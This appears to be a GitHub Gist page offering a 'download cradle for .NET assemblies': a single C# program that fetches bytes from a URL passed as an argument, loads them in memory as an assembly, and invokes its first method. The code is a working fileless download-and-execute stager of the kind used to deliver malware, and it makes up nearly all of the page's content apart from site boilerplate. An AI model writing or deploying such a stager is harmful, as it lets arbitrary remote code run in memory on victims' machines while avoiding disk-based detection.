-
-
Save Random1984/8bac5ebfee31cf6357eb4db8d6d0b0f8 to your computer and use it in GitHub Desktop.
A download cradle for .NET assemblies.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment